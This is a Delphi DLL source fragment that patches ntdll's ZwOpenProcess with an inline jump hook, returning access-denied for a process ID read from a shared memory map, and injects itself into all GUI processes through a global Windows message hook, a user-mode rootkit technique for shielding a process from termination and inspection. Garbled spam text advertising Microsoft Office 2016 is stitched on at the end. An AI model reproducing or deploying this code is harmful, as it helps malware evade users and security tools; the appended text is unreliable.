procedure UnHook;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
end;
Function TrueZwOpenProcess(phProcess:PDWORD; AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
ClientID:PClientID):NTStatus;stdcall;
begin
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(Oldcode),b);
Result:= ZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID);
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
end;
Function NewZwOpenProcess(phProcess:PDWORD;AccessMask:DWORD;ObjectAttributes:PObjectAttributes;
ClientID:PClientID):NTStatus;stdcall;
begin
if (ClientID<>nil) and (ClientID.UniqueProcess=pid) then
begin
Result:=STATUS_ACCESS_DENIED;
exit;
end;
Result:= TrueZwOpenProcess(phProcess,AccessMask,ObjectAttributes,ClientID);
end;
procedure SetHook;
begin
PFunc:=GetProcAddress(GetModuleHandle('ntdll.dll'),'ZwOpenProcess');
ReadProcessMemory(INVALID_HANDLE_VALUE,PFunc,@OldFunc,sizeof(oldcode),b);
NewFunc.push:=$68;
NewFunc.PProc:=@NewZwOpenProcess;
NewFunc.ret:=$C3;
WriteProcessMemory(INVALID_HANDLE_VALUE,PFunc,@NewFunc,sizeof(far_jmp),b);
end;
function MessageProc(code : integer; wParam : word; lParam : longint) : longint; stdcall;
begin
CallNextHookEx(0,code,wParam,lParam);
end;
procedure SetGlobalHookProc();
begin
SetWindowsHookEx(WH_GETMESSAGE, @MessageProc, HInstance, 0);
Sleep(INFINITE)
end;
procedure SetGlobalHook();
var
hMutex: dword;
TrId: dword;
begin
hMutex := CreateMutex(nil, false, '[{AD6A3658-0AB1-4C9D-93BA-44A06707C676}]');
if GetLastError = 0 then
CreateThread(nil, 0, @SetGlobalHookProc, nil, 0, TrId)
else
CloseHandle(hMutex)
end;
procedure GetPID;
var
map:THandle;
addrmap:PDWORD;
begin
map:=OpenFileMapping(FILE_MAP_READ,false,'lamecame');
addrmap:=MapViewOfFile(map,FILE_MAP_READ,0,0,8);
pid:=addrmap^;
UnMapViewOfFile(addrmap);
CloseHandle(map);
end;
procedure DLLEntryPoint(dwReason: DWord);
begin
case dwReason of
DLL_PROCESS_ATTACH: begin
GetPID;
SetHook;
SetGlobalHook;
end;
DLL_PROCESS_DETACH: begin
UnHook;
end;
end;
end;
begin
DllProc:= @DLLEntryPoint;
DLLEntryPoint(DLL_PROCESS_ATTACH);
end.
Microsoft 'office' office and Home 2016, is clever, adaptive and easy to use. Wonder visitors bot allows just about any end user to generate good quality presentations and documents. Irrespective should you be new or perhaps a pc wizard, this convenient software package is produced to help you to increase your output. Program schedules, make PowerPoint presentations or share your projects towards the cloud. Improve your output while using Microsoft 'office' 2016 computer software.
